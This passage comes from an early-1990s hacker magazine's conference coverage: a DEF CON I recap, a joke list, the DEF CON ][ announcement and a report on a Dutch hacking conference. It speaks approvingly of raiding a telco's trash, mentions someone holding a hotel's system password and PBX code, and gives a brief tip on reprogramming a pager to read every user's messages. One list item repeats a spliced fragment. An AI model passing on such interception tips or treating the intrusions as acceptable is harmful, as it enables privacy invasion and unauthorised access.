then we got a picture more of them. Metal Head went and got me a drink while he was out. Things were looking good through this buzz of mine. Judi Clark of the Bay Area CPSR showed up (one of the speakers) and was real cool. She was jonesing for an internet connection, but we couldn't line one up with a slip connection for her. She had brought some literature to distribute, too. Around six or seven or so we had a pretty good crowd going, with more and more speakers showing up. Ray Kaplan (Kaplan and Associates) drove like a maniac out of Arizona, and Dr. Ludwig (Author of Little Black Book of Computer Viruses) drove up with Merc from Arizona also. It was about ten or so Friday night and people were getting to know each other. Some more radio guys showed up, including the Jackal, and they were in another corner speaking in some other language.. stuff I won't even try to reproduce here. It revolved around the best ways to pick up restricted channels and how not to be triangulated. Cool. Speculation was rising about what Gail Thackery would be like, and when Gillian from New Media Magazine showed up to cover the event people figured that she must be Gail. Nope. Gail showed up about a half hour later. Conversation in the room stopped, and all eyes were on Gail. She didn't seem to notice, and came up and said hello. I gave her a speakers id pass, and she went off to find a drink. When she returned people started to talk to her, and by about midnight she was mobbed with people. She had a captive audience at the back of the room and was fielding all types of questions. Some guy was saying "Say, hypothetically, that you have 9 gigs all encrypted on your, re, a bbs and you get raided, wow will they get the evidence?" Gail's response was basically if they have enough evidence to boot in your door they should have enough evidence to prosecute a case. Want to be a test case for encryption? Neither did he. Kurt Karnow, the VR speaker from San Francisco showed up and was talking with the New Media Reporter. Some local radio d.j. who does a late night cutting edge style showed up to grab some audio clips from me and bailed out. A "suit" showed up, and everyone immediately, in an attempt to win the free "I spotted the fed" shirt pointed him out to me. This "suit" had cop eyes, cop walk and cop speak. He was all businesslike, and wanted to talk to me in private. I took him into the "cone-o-silence" room (the hallway connected to the travel agent's place) and asked what's up. Turns out he is a writer for Loompanics and was there checking to see if there was anything or anyone worth writing about or having write for him. Everyone was sure I was a super narc after coming out of the cone, but he started loosening up and was talking with everyone by the next day. If he was a fed, they have great feds out there that are almost undetectable. He said his cop speak is a great way to get people to tell him stuff they wouldn't normally say. Dan Farmer showed up with a female harem in tow. He seemed to have this ability to magically attract females, but we won't get into that here. He would make an appearance and then leave every once in a while. His women looked bored (there were three of them) so I assume he was keeping them entertained by gambling or something... Dark Druid showed up with Richard Finch, an author who is writing a book entitled "The underground road map through cyberspace" Oh, yeah. This guy still owes me a copy of the video tapes from the convention. Basically a snake. Said he would send me a copy of them, and then moved and changed his number. We located him and he said he would send them again. Not. L00zer. Dark Druid was cool, though, and was franticly looking for alcohol to comfort him after the long drive. One person I met worked for Logicon, SOF Weapon Systems, doing "Nuclear event testing." Basically his job is to see if he can break in and cause a simulated "event" (missile launch, detonation, etc.) to happen. I'll invite this guy to speak at DEF CON ][ for sure. Not that people are going to hack silos, but it was very interesting to say the least. It was decided it was time for a "Death Star" raid (we had spotted the local AT&T office with a billion repeaters and microwave shit on the roof) and rounded up a crew to go attack it. Of course Red Five was standing by (Ow!) and Gillian offered to rent a limo to go trashing in. It turned out that it would take 1/2 hour to get the limo, so we went in two cars instead. After getting lost in the Las Vegas Hell we found the target. Fences everywhere, a guard patrolling, and an unprotected dumpster just by the fences. Red Five radioed to his friend, we coordinated an attack plan. I laid down flat in the back of the truck, another car was "blocker" on the street. We turned in, screeched up to the treasure chest, I bailed out and hurled the bags into the truck and pounced on top of them to the papers wouldn't fly out as we hauled ass outta there. Those Vegas telco employees eat more dino-sized McMeals and burgers than I can count. My body was almost covered in apple pie containers and happy meals, yuck. We hauled the find up to the room, and the people who were still up dived on it. Jamin the Shamin went bonkers rooting through crap, and I think White Ninja was sportin' wood. People got some interesting items (catalogues, some x.25 phone numbers, etc..) while I got to clean up the mess, er, wreckage in the room. Everyone pitched in and by two thirty a.m. it was time to snooze. Everyone took off to wherever they were going, and a few people stuck around to crash in the conference room. It seems over the night that the late shift of security personnel were not informed that I had the conference room 24 hours. They showed up at around four a.m. and saw Code Ripper, The Prophet and Merc crashed out and they went nuts. At first they asked them to leave to room. The Prophet explained that the room was rented 24 hours, and they didn't care. He then asked to talk to the assistant manager. They didn't like this and called in the goons. Like five or more guards showed up. In Las Vegas the goons carry guns. These guys asked to have 'em leave and Code Ripper and Merc were like "Sure, no prob. Later!" The Prophet continued to bitch and got a personal interview with head guard man and then a personal boot off the hotel's property. Saturday morning I get a fax that Allen Grogan (Editor of the Computer Lawyer) won't be able to make it because of a family emergency. That's one less speaker. Already Count Zero's dad went ballistic when he found out his son might speak at the con. He threatened to sue me if he showed up. Dude, chill, it's your son, not mine. It turns out he called the Sands Hotel ranting and raving at anyone he could. Moreen said, "he was spouting off things about law suits and some such, so I transferred him to legal." What a kook. Midnight Sorrow (used to run CCi) backed out too after his phone bills reached like half of the national debt. ErikB spent too much money at SCon and he bailed out also. They were dropping like flies! Scott Simpson wasn't about to show up after his door was kicked in with the help of various federal agencies, either. Oh well, we still had a full speaking list. Robert X. Cringly from Info World was there, a photographer from Mac World, John Littman, Unix World (<- an evil review.. don't believe it.. it was all wrong and jumbled. Rik Farrow messed it up) another photographer who took the picture that ended up in New Media was there. The photographer (Who turned out to be Karnow's sister) gathered some "cyberpunk" looking people together for it.. needless to say I wasn't in it. She bought a bunch of alcohol for everyone, so that wasn't so bad. I did a little blurb welcoming everyone and talking about my run in at the Seattle 2600 meeting a few weeks before, and then let Ray K. start off the convention. About halfway through the talks before lunch, the X. Cringe factor got a cellular phone call, and got up to leave the room so as not to disturb the audience. He was about halfway towards the door when you could hear scanners turning on all over the room (well, OK, three of them) and a coordinated effort was put forth to find his call. Some start at the low frequencies and worked up, and some at the high frequencies and worked down. It turns out it was only Pammy, and no super secret industry gossip. Bummer. I'm not going to cover exactly what the speakers had to say because I wouldn't know what to include and what not too. Get the tapes, or ftp the huge digitized speeches off the ftp site (cyberspace.com /pub/defcon) and listen to 'em. We tried to make typed transcripts, but they were a nightmare, so we gave up on it. This is basically what was covered: Ray Kaplan did a verbal sample of the attendees, and then went on to talk about morality and the hacking ethic. He came across pro-responsible-hacker, but managed to get into a debate with Torquamada who though he was preaching too much. A good exchange, and his talk reminded me of some of the stuff you hear on IRC late at night when #hack becomes #hack-politics, only better. Gail Thackery spoke about where the law is coming from in all this, and was very straight forward with a no shit attitude. She said she loved capturing and collecting all the log in screens of bbs systems that have lame disclaimers like "If you are a fed you can't log on here. If you press 'y' you can never narc on me." She swaps 'em with her other law enforcement friends. As a side note we were selling hack pads and bbs pads that attempted to organize all the notes people make in the course of things. It seems every one who gets nabbed gets nabbed with their "bust-me book" You know, that note pad with all the incriminating evidence on it that everyone keeps. Well we figured we'd at least make things easier so we had these pads. Gail looked them over and made a comment like, "Oh, those look just like ours except we have a space for the case number in the upper right hand corner." Judy Clark from the CPSR spoke about the role of the CPSR (Computer Professionals for Social Responsibility) as opposed to that of the EFF which is almost entirely, well, er, it is, sponsored by large corporations including computer and telephone interests. She spoke about privacy issues and what to do if you are interested in getting involved. There was a panel discussion with Gail and Ray K fielding questions from the audience. Ray talked about how security is useless unless the employers and employees are willing to change their way of working. It's not as simple as installing the latest and greatest security packages. Kurt Karnow works as an attorney for a San Fransisco law firm that represents large companies such as AT&T and Sega. He spoke about "ZUI" or Zero User Interface as envisioned in the future with VR equipment. He talked about how impossible it is to debug any large program 100%, and that mistakes and problems will occur. He talked of a recent case he worked on, where the makers of "Sim City" made "Sim Oil Refinery" for a large oil company. The company was concerned that if their software was programmed incorrectly, and they find that out by having a refinery explode when the employees did something they were trained to do, that they could loose all. Kurt was also great is shamelessly hoping some for a few good accidents so he could finance his kids through college. A very well informed and easy to talk to person. Dr. Mark Ludwig Spoke about the philosophy behind his virii programming analysis. It was almost a political talk about the invasive government policies and the desire of the Federal System to be the know all and be all in the future. He spoke about their attempts to restrict encryption technologies. He announced that he has come up with a virus that acts as a software delivery service for the IDEA encryption algorithm. When you insert this disk, or get the "infection" it asks if you want to encrypt your fixed disk, and then asks for your password. Any floppy that is inserted on your system gets encrypted and infected with the password of your choice. You can toggle the encryption on and off, un-install your hard drive, etc. He posed the question to the crowd, "What if everyone woke up one day and all their data was safely encrypted? If encryption became the standard, people would have less to fear from Big Brother." I've got the virus, called the KOH virus, currently being updated, and will bring it to Pump Con ][, Ho Ho, Etc. for anyone interested. Dead Addict spoke on the past and the future as he sees it of the Computer Underground's various factions. The increase of people on the net and the use of more and more networks will yield rich lands to be explored. It turned into a question and answer with people discussing their view on where things are going. Dan Farmer spoke on Unix security. He was very good and sounded very well informed. He has learned his tricks monitoring the 30,000 or so workstations used by Sun Microsystem and else where over the years. He talked about how people get caught and what to do about it. How sysadmins usually monitor and maintain their systems. Basically he was bored with password crackers and lame passwords. He focused on the creative ways to get root. "If you can gain access enough to execute one command on the victim computer, you should be able to get root." He avoided bugs and problems that will be fixed, and focused on flaws in the way systems and networks are set up. Dark Druid talked about his bust and how it sucks not to be charged and still not have his equipment back after it was seized. Right as the group was breaking up someone did a quick impromptu demonstration to a few people of a laptop plugged into the diagnostic port of a cell phone that allowed all types of crazy activity. People broke into groups and went out for dinner. I ended up with Gail Thackery, Gillian the reporter, Kurt Karnow, the sysadmin of cyberspace and a few others. General B.S. about government plots and assassinations ensued with real discussions branching off. Because there are no clocks anywhere in Las Vegas we kinda lost track of time, and wandered back to the hotel in an hour or so. People changed and the broke off to do their thing. I ran into a guy from SGI security at the bar, and then Dan Farmer, and then Aleph One, and then fuck, it seemed like a mini con at the bar. People were drinking like fiends, and Gail showed up with Gillian and the crowd from L.A. and the San Francisco 2600 group was there drinking too. Gail was chain smoking and pounding Johnny Walker straight, drinking most of us under the table. I think that shocked more people more than anything else! We finally got a thinly clad waitress to take a group picture, where everyone is all smiles and laughing, and Gail has this evil frown looking like this is the last place on earth she wants to be. Right as the pic is taken someone goes to fake pour a drink on her head, making for a great picture WHICH I STILL DON'T HAVE! (Aleph One, send me that digitized picture so I can stick it on the ftp site) Sunday people just hung out to bull-shit about whatever, with groups forming on and off till everyone took off for home. Someone approached me and let me know that they had the password for the Sands Hotel Vax system and the barrier code for their PBX. "If the hotel gave you too much trouble, just let me know." You would think that after years of mob and crime action the casino would have a functional security set up. Not. That was area code 702 for anyone interested in scanning it. A few of use were sitting around waiting for time to pass when I found a bunch of wires wrapped together from the death star raid Friday night. It sort of looked like a mini whip, and was immediately termed the "Def Con Cyber-Whip" Needless to say, we had to present the Cyber-Whip to Dan Farmer for his excellent contribution mention of a.s.b. during his speech that seemed to cause the most gossip. Hacking a network? No problem. Talking about a.s.b.? OuTrAgEoUs! People are so funny. Anyway, Dan is now the keeper of the Cyber-Whip. We'll try to come up with a more formal presentation next year. That should drive the media nuts. Hey, with a little help from ErikB for video entertainment maybe create a Def Con dungeon. Ha! Ok, it's late. Hackers are such sick people. A lot of people made great contacts and I'm still hearing of people who are working with their new contacts doing "things" I managed to weasel a job out of the deal, writing a small monthly column in New Media Magazine (as my editor puts it) on "Interesting things that could only happen on the net." This gets translated to reading a bunch of newsgroups in a futile attempt to find something that would be amusing to the readership. If you guys have any good rumors you want mentioned, just feed 'em to me in e-mail. Overall a good time. We planned for about 100 people max, and we got just around 110 or so. Our blurb in 2600 came out late, Mondo 2000 missed an issue and Wired messed up hard core twice. I had mailed LR inviting someone to attend and asking if we could get a mention in the upcoming events section. He said sure, just e-mail me. I did that and nothing happened. I talked to him, and he said I should send it to someone else at Wired, which I did. It wasn't in the next issue either! Right before the con I got e-mail form someone at Wired asking me if the convention was still on and what its status was. They are nice people there, just a little bit confused or busy. This was happening right after wired.com got hacked so they might have been preoccupied. This year we won't miss any deadlines and make sure that the word gets spread well in advance so we can get a greater turn out, but for a first attempt it went over well. No fights, fire alarms pulled or people vomiting on the gamblers. The things that could be improved like more technical speeches, etc., will all be fixed in DEF CON ][. We'll have midnight tech talks, terminals hooked up to the net for people to IRC on or whatever, and additional speeches on Sunday so people have an excuse to stick around that day. [Generic closing statement omitted] The Dark Tangent dtangent@defcon.org ******************************************************************************* Top 23(!) things learned at DEF CON 1 By The White Ninja "Jesus Hacks! Why don't YOU?" This text file idea blatantly leeched from: SummerCon! 1. Casino offices can be full of fun!! 2. Casinos generally don't appreciate it when you explore their offices.... 3. Yes, some people ARE capable of gambling away $167 in an hour! 4. You can get reasonable conference discounts on prostitution in Nevada. 5. One can survive for 3 days in Vegas on $12 and a gift certificate. 6. Viruses are our friends. 7. Give a Casino security guard a walkie-talkie and he'll swear he's the center of the universe. 8. Don't commit a felony in front of Gail Thackery. 9. The people who work at the Death Star throw the darndest things in the trash! 10. Pirates and Theives ONLY! 11. If you harass a hotel telephone operator long enough she WILL send security. 12. When using ITT ask for BOB... 13. Metal plates screwed to your hotel room ceiling generally constitute a bad sign. 14. Don't forget to Hack the BED! 15. You know your in deep shit when THEY aim an IR-Mic at your window. 16. Setting 11 fires in selected parts of the city is probably a bad idea. 17. The guy who looks most like a fed probably writes for LOOMPANICS. 18. The guy who looks least like a fed probably does security for SUN. 19. As a general rule, don't hack the hotel PBX unless you're giving them a better credit rating. 20. If your wondering where all those C-64 warez kidz went, try talking to some of the beggars in Vegas. 21. Those COCOTS were gold plated for a REASON! 22. If you plan to stay the night in a hotel, make sure you get a room there. 23. "0K, dit rating. 20. If your wondering where all those C-64 warez kidz went, try talking to some of the beggars in Vegas. 21. Those COCOTS were gold plated for a REASON! 22. If you plan to stay the night in a hotel, make sure you get a room there. 23. "0K, this is my new PGP key for use in sensitive matters. Heck, use it for unsensitive matters.. people sniff packets 'ya know." ******************************************************************************* What Was Your Best Hack September, 1993 ~~~~~~~~~~~~~~~~~~~~~~~ (New Media) (Page 14) [Asked at Def Con 1, the first formal gathering of the hacker community to discuss security, viruses and the law.] Mike Winters, 19, Seattle Claims to have hacked into GMAC and then held a conference call with GM's VP of Finance to help him "secure the system." HB, San Mateo, California Broke into a system to counterfeit checks to "show his employers how easy it was." Got arrested with two years probation and 24 days of community service. Gail Thackeray, 44, Deputy County Attorney, Phoenix A Hacker had broken into a voice mail system and was using it as a code line. The company could not take down the system until the prosecutors were ready to make a case. When they did, the company blocked all access and changed the greeting to a song parody of "Hey Jude" called "Hey Dood," which really infuriated the hacker. ******************************************************************************* Dead Addict At Def Con September, 1993 ~~~~~~~~~~~~~~~~~~~~~~ by Gillian Newson (New Media) (Page 119) ["The oldest cyberchick" hangs with the Def Con Posse and discovers the joys of trashing.] ******************************************************************************* READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE ]]]]]]]]]]]]]]]]]] ]]] ]] ] ]] DEF CON ][ Initial Announcement ]]]]]]]^^^^]]]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement ]]]]]]^^^^^^]]]]] ] ] ] DEF CON ][ Initial Announcement ]]]]]^^^^^^^^]]]]] ]] ] DEF CON ][ Initial Announcement ]]]]^^^^^^^^^^]]] ] ]]]]]]]] ] DEF CON ][ Initial Announcement ]]]^^^^^^^^^^^^]]]]]]]]]] ] DEF CON ][ Initial Announcement ]]^^^^^^^^^^^^^^]]]]]] ]] ] DEF CON ][ Initial Announcement ]]]^^^^^^^^^^^^]]]]]]]] DEF CON ][ Initial Announcement ]]]]^^^^^^^^^^]]]]]]]] ] ]] DEF CON ][ Initial Announcement ]]]]]^^^^^^^^]]]]]]] ]]] ]] ] DEF CON ][ Initial Announcement ]]]]]]^^^^^^]]]]]]] ] ] ] DEF CON ][ Initial Announcement ]]]]]]]^^^^]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ] DEF CON ][ Initial Announcement READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE WTF is this? This is the initial announcement and invitation to DEF CON ][, a convention for the "underground" elements of the computer culture. We try to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies, Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, Futurists, etc.. WHO: You know who you are, you shady characters. WHAT: A convention for you to meet, party, and listen to some speeches that you would normally never hear. WHEN: July 22, 23, 24 - 1994 WHERE: Las Vegas, Nevada @ The Sahara Hotel So you heard about DEF CON I, and want to hit part ][? You heard about the parties, the info discussed, the bizarre atmosphere of Las Vegas and want to check it out in person? Load up your laptop muffy, we're heading to Vegas! Here is what Three out of Three people said about last years convention: "DEF CON I, last week in Las Vegas, was both the strangest and the best computer event I have attended in years." -- Robert X. Cringely, Info World "Toto, I don't think we're at COMDEX anymore." -- Coderipper, Gray Areas "Soon we were at the hotel going through the spoils: fax sheets, catalogs, bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds. The documents disappeared in seconds." -- Gillian Newson, New Media Magazine DESCRIPTION: Last year we held DEF CON I, which went over great, and this year we are planning on being bigger and better. We have expanded the number of speakers to included midnight tech talks and additional speaking on Sunday. We attempt to bring the underground into contact with "legitimate" speakers. Sure it's great to meet and party with fellow hackers, but besides that we try to provide information and speakers in a forum that can't be found at other conferences. WHAT'S NEW THIS YEAR: This year will be much larger and more organized than last year. We have a much larger meeting area, and have better name recognition. Because of this we will have more speakers on broader topics, we plan on having a slip connection with multiple terminals and an IRC connection provided by cyberspace.com. We are trying to arrange a VR demo of some sort. Dr. Ludwig will present this years virus creation award. There will be door prizes, and as usual a bigger and better "Spot The Fed" contest. If you are elite enough to handle it, there should be the returning of the Cyber-Whip and the beginning of a new one. We'll try to get an interesting video or two for people to watch. If you have any cool footage you want shown, email me with more information. WHO IS SPEAKING: We are still lining up speakers, but we have several people who have expressed interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer Viruses), Phillip Zimmerman (PGP), The Mentor (Steve Jackson Games), Ken Phillips (Meta Information), and Jackal (Radio) to name a few, plus there should be a mystery speaker via video conference. We are still contacting various groups and individuals, and don't want to say anything until we are as sure as we can be. If you think you are interested in speaking on a self selected topic, please contact me. As the speaking list is completed there will be another announcement letting people know who is expected to talk, and on what topic. WHERE THIS THING IS: It's in Las Vegas, the town that never sleeps. Really. There are no clocks anywhere in an attempt to lull you into believing the day never ends. Talk about virtual reality, this place fits the bill with no clunky hardware. If you have a buzz you may never know the difference. It will be at the Sahara Hotel. Intel as follows: The Sahara Hotel 1.800.634.6078 Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax Transportation: Shuttles from the airport for cheap NOTES: Please make it clear you are registering for the DEF CON ][ convention to get the room rates. Our convention space price is based on how many people register. Register under a false name if it makes you feel better, 'cuz the more that register the better for my pocket book. No one under 21 can rent a room by themselves, so get your buddy who is 21 to rent for you and crash out. Don't let the hotel people get their hands on your baggage, or there is a mandatory $3 group baggage fee. Vegas has killer unions. COST: Cost is whatever you pay for a hotel room split however many ways, plus $15 if you preregister, or $30 at the door. This gets you a nifty 24 bit color name tag (We're gonna make it niftier this year) and your foot in the door. There are fast food places all over, and there is alcohol all over the place, the trick is to get it during a happy hour for maximum cheapness. FOR MORE INFORMATION: For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in /pub/defcon. There are digitized pictures, digitized speeches and text files with the latest up to date info available. For email users, you can email dtangent@defcon.org for more information. For Snail Mail send to DEF CON, 2702 E. Madison Street, Seattle, WA, 99207 For Voice Mail and maybe a human, 0-700-TANGENT on an AT&T phone. A DEF CON Mailing list is maintained, and the latest announcements are mailed automatically to you. If you wish to be added to the list just send email to dtangent@defcon.org. We also maintain a chat mailing list where people can talk to one another and plan rides, talk, whatever. If you request to be on this list your email address will be shown to everyone, just so you are aware. STUFF TO SPEND YOUR MONEY ON: > Tapes of last years speakers (four 90 minute tapes) are available for $20 > DEF CON I tee-shirts (white, large only) with large color logo on the front, and on the back the Fourth Amendment, past and present. This is shirt v 1.1 with no type-o's. These are $20, and sweatshirts are $25. > Pre-Register for next year in advance for $15 and save half. > Make all checks/money orders/etc. out to DEF CON, and mail to the address above. If you have any confidential info to send, use this PGP key to encrypt: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50 IDxkdGFuZ2VudEBkZWZjb24ub3JnPg== =ko7s -----END PGP PUBLIC KEY BLOCK----- ==Phrack Magazine== Volume Four, Issue Forty-Four, File 8 of 27 Conference News Part III **************************************************************************** A Hacker At The End Of The Universe by Erik Bloodaxe Eight hours on a plane isn't that bad. It isn't that fucking great either, but it isn't the end of the world. This is especially true under certain circumstances like if you were being inducted into the mile-high club by means of an obscure tantric ceremony, or you've just successfully hijacked a 747, or you are nestled in your seat on your way to Amsterdam. Unfortunately, I haven't hijacked much lately, and as far as the mile high club goes I'm pretty sure you need a partner to join; but as I was on my way to Hacktic's Hacking at the End of the Universe conference, I was stoked. When I finally arrived in Amsterdam and breezed through customs, I was greeted with the pleasant sight of a LOD Internet World Tour T-Shirt being held up above the throngs congregating at the customs exit. Its owner, Carl, was probably the only American that I knew that was going to be in this country so we had arranged previously to meet. The shirt was my beacon. EB's Handy Travelling Tip #1: Never have more bags than you have hands. I was to find out that we were in for a good deal of walking. Me being such a fucking plan ahead kind of guy, had packed enough clothes for 8 days and brought a camcorder as well as my laptop and assorted other crap. This was all find and dandy except for the fact that I had three bags and only two hands. I hoisted one bag up on a shoulder strap (which would begin its week-long gradual slicing into my collarbone) and drug the other two bags behind me. Carl had rented a room in Naarden at a Best Western or something. The con was in Lelystad somewhere. Neither of us had any idea of exactly where these two places were in relation to one another. We would soon find that they were no where close. EB's Handy Travelling Trip #2: Buy a Eurail Pass or the national equivalent thereof. Luckily, Carl had the foresight to suggest that we should buy a train pass for the week. It was only like 50 bucks and got us free rides on the trains, trams, buses, and train-taxis everywhere in the Netherlands. It MORE than paid for itself. We hopped a train and rode to the Amere stop, then took a taxi to the hotel, dropped off our crap then rode a bus back to the station and went into Amsterdam. Amsterdam is a really neat place. I think everyone should go there at least once. Carl and I wandered around for hours and hours just checking things out. During our travels I discovered some really neat places. EB's Handy Travelling Tip #3: Pornography Is Good. Foreign Pornography is GREAT! I have to respect a country that has smut proudly displayed everywhere. In every magazine rack, in every train station, convenience store and in large (clean, well-lit, heh) stores everywhere, smut. Not your average run of the mill nastiness either. We're talking monumental titles like "Teenage Sperm," "Seventeen," "Teeners From Holland," "Sex Bizarre," and "Color Climax." I went in every smut shop we saw. I think Carl wanted to die of embarrassment. I was like a kid in a candy store. It was really pathetic. You would not believe the shit they sell over there. Well, maybe you would. I pray that I can buy a vcr that transfers PAL to NTSC someday. One of the most hilarious items I saw was a HUGE dildo in the shape of an arm with a fist. And I mean life size. Like Arnold Schwartzenegger's arm life size. I wonder if that's a big seller? We finally got totally zonked out and headed back to the hotel to relieve our jetlag tomorrow was the con! EB's Handy Travelling Tip #4: Always take the Train Taxi In Holland, once you get off the train, for an extra 10 guilders, you can get a pass for a special taxi to take you anywhere you need to go. Carl and I didn't find this out until a few 20 dollar cab rides to the campground. HEU was held out in the Dutch countryside. A more appropriate title might have been "Hacking in the Middle of Fucking Nowhere." The taxi driver had been shuttling people out there all day. As we approached the campground signs for the conference began to show up. Signs of geekdom on the horizon. We got out at the gate, and walked over to the tent that said registration. In the tent were a couple of guys who took your picture and printed out a badge with your picture digitized on it. The area was layed out very well. There was a very big barn like structure where several dozen computers were all networked together. I sat down at one and saw that there was even a slip trying to work. With that many people trying to be on the net, it was almost 20 baud! Wow, technology at its finest. :) I also noticed that at least 2 people were running ethernet sniffers, so I decided that it would not be prudent to mess with the net there, even if the bandwidth dramatically increased. Also in the barn were a tv/vcr area, several couches, a merchandise area and a snack bar. The snack bar sold rolls for a buck, and had free sandwich makings (like pb & j, cheese & meat, etc..) chips, jolt, and beer. This was very important to me since I was wondering if I'd get to eat. There was to be some kind of food provided (a meal) for five bucks, but it was so foul that it could not be believed. And to top it all off it was vegetarian. Not just regular vegetarian, but totally off beat stuff that smelled like old socks. Nasty gruel unfit for even prisoners. Behind the barn was the camping area. There was a HUGE tent that was the main meeting area, and several mid-size tents. Additionally there was a large lookout tower, and a shitload of tents set up for sleeping. Running all over the campground were cables for the conference's LAN. It was impressive so say the least. One of the first people I ran into at the con was KCrow. He helped me try to find a safe place to stow some of my crap. (Again, me and my fucking bags. I'm such an asshole.) We tried to place them in the network control room, but Bill SF told me to "get the hell out of there," so I did. And this of course, has left me with a wonderful opinion about Bill SF. (Bill, I love ya!) Several people tried to make excuses in his behalf such as "he hadn't slept in days," or "Bill isn't ever so rude," and "He's got a lot on his mind." Yeah, right. (And I didn't even say ANYTHING about how shitty it would be to try to make millions counterfeiting something, then let one of your friends take the fall for you, while you left the country. Nope. I would never be so rude. There is a difference between a true hacker and an opportunistic technologically literate criminal. But I didn't say that.) I finally just stuck my stuff behind the merchandising area and prayed that there was still honor among thieves. I then ran into Damiano. He told me who was around. Several CCC people had arrived in a convoy of odd urban assault vehicles. The Germans (other than Damiano) kind of made me uneasy. They seemed to hang together and didn't talk to many non-germans. I suppose maybe some of them didn't speak English, or maybe I was just thinking odd Nazi fantasies. I dunno. Of all the people that were supposedly there, I kept missing Pengo. It was like some kind of weird trick. "Did you see him? He was just here." I never saw him. That afternoon I only made it to one "workshop." I was to find out later that all of the really technical workshops had a common thread. "Here's this cool technology, now go buy it from Hack-Tic for several hundred dollars." The first example I had of this was in the "It came out of the sky" workshop where Bill SF talked about a device they had made that received pager information. They presented a few scenarios in which police or other nasties might watch pagers, or always page certain numbers right before raids, etc... The concept was neat, but certainly nothing new. For a few bucks more than they were asking for the Hack-Tic model, you can buy a multimode decoder from Universal Radio (model M-400). It not only does POCSAG but also GOLAY (for pagers), ACARS, ASCII, Baudot, SITOR A & B, FEC-A, SWED-ARQ, FAX, CTSS, DCS & DTMF! Now that's a decoder. Additionally, a company called SWS security makes a similar device for law enforcement people at about $4,000 that does nothing but decode pager information. If it came right down to it, all you would have to do is open up your beeper, dump the rom, and tell it to display info for ALL cap-codes rather than just yours. Your cap-code is written on the back of your beeper, and is stored in non-volatile memory somewhere. Look for the call to it, and have it always branch to the display routine rather than do a comparison. I asked Bill about re-crystaling the device, since it there's would only be able to pick up one pager channel as is, and about whether or not anyone had played with any of the 8-bit paging types such as is used in America on services such as EMBARC. Bill looked at me as if I was on crack, and asked, "Are there any other questions?" Sigh. After that workshop, I took off with Andy of the Chaos Computer Club back to the German enclave. These guys were nuts. They had several winnebagoes totally decked out with all kinds of archaic electronic gear. They had all kinds of odd radio equipment; weird shit with Russian lettering was strewn about. The guys hanging about were jamming out really loud hard techno. I leeched a few programs from Andy and then took off back to the main area. Sometime later, a guy who said he knew me from way back named Mr. Miracle came up to say hello. I had no idea, but since I rarely remember my own name, I took him for his word. Mr. Miracle was at the con with his friends Wim and a Tasmanian Amiga Dude named XTC. We hung out the rest of the afternoon bullshitting and talking about all kinds of stupid things. As it grew dark, everyone moved into the Barn. Me, Carl, Mr. Miracle, XTC, Wim, and another Dutch Hacker named The Dude sat down to drink. We were joined for a bit by another Dutchman named The Key. He was totally into lock picking, and had a plethora of picks. (Car masters, traditional rakes, tube lock picks, and a weird looking pick for all new model fords.) The Key was a large, sinister looking guy who never took off his extremely dark sunglasses. I don't know if it was only for effect, but it certainly worked. I decided it was high time to introduce the Dutch to that quaint American custom, Quarters. We must have gone through some 200 glasses of beer, and were extremely loud, drunk and obnoxious. One woman (I think it was a woman) wandered over to us and said, shouldn't you all be on the computers or something. We cursed until she left. Mr. Miracle invited Carl and I to stay at his place for the rest of the con so we wouldn't have to go all the way back to our hotel. This was a godsend. We all piled into The Dude's car for a ride to the apartment that made Busch Garden's "Kumba" look like a merry-go-round. We were quite happy to make it home alive. Xtc was also staying at Mr. Miracle's. We all spilled onto the floor upstairs in his townhouse. While we were all getting ready to pass out, Xtc yakked all over a bathroom. Needless to say Mr. Miracle and his girlfriend were pissed. We all thought there was going to be a death, but somehow Xtc lucked out. The next morning we all took off over to check out of the Hotel Carl and I had rented. Carl had put some money in their safe. Of course, the safe broke, and it took them nearly an hour to destroy the safe completely so Carl could retrieve his 300 in traveller's checks. Mr. Miracle remarked, "Where's The Key when you need him." When we finally ended up back at the con, there was a large meeting going on about Phone Phreaking. Emmanuel Goldstein, Bill SF, Rop, KCrow (KCROW??) and others were babbling on the panel. Phiber Optik was on a speaker phone adding commentary. I toyed with the idea of getting on the phone and wishing him well and telling him how cool it was in Holland, but I decided that would be too mean. I sat outside the panel listening to everyone complain about the evils of the phone company. Many got up and argued that what they were doing was morally right, because the phone company charges too much. They also argued that since the lines were already there they should be able to use them for free. I got disgusted and began yelling about how there were chairs in the tent not being used and I wanted my hundred guilders back. Several people gathered around and I kept ranting. Mr. Miracle joined in on the spree and began challenging just how much Hack-Tic was making off of the conference. He estimated at minimum 500 people at 100 guilders a piece. 50000 guilders. That's a lot of money. The crowd gathering around us began questioning the whole situation too. It got ugly, but none of us had the balls to say anything about it. Later that day I sat down to hear Fidelio and RGB give a talk about Unix Security. I had asked them beforehand if they were going to talk about anything that I wouldn't know. (God, afterwards, I realized just how snotty that sounded. I'm a prick.) It went pretty good since most of the people in the crowd weren't gurus and this gave them a good overview. Afterwards, Bill SF was holding a workshop about Wireless LANs. I was thinking this would be a tutorial about wireless lan theory and how their security was handled, etc. WRONG! Hack-Tic is supposedly building a frequency hopping wireless ethernet adaptor. (Soon to be available at a store near you.) I asked Bill why they went with frequency hopping rather than direct sequence. There are basically two schools of thought about spread spectrum, and both have their plusses. Bill said their device would be hard to jam. I replied that if I pumped as little as 1 watt over a particular range, maybe like a 15 Mhz range, their device would be just as hosed as anyone else's. As an afterthought, I hope they build it in the 2.4GHz range, because 